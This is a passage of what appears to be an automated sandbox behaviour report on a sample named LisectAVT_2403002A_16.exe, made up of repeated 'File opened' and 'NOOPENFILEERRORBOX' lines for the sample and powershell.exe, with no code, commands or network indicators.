                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
